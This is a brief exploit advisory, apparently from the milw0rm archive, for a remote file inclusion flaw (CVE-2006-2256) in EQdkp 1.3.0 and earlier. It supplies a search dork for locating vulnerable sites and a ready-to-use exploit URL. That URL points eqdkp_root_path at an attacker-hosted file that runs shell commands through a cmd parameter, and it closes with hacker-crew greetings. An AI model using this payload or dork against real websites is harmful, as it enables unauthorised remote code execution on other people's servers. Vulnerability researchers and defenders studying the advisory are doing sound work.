EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion

Related Vulnerabilities: CVE-2006-2256  
Publish Date: 07 May 2006
Author: OLiBekaS
                							

                Title: EQdkp <= 1.3.0 Remote File Inclusion
URL: http://www.eqdkp.com/
Dork: "powered by EQdkp"
Author: OLiBekaS
greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew

Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-05-07]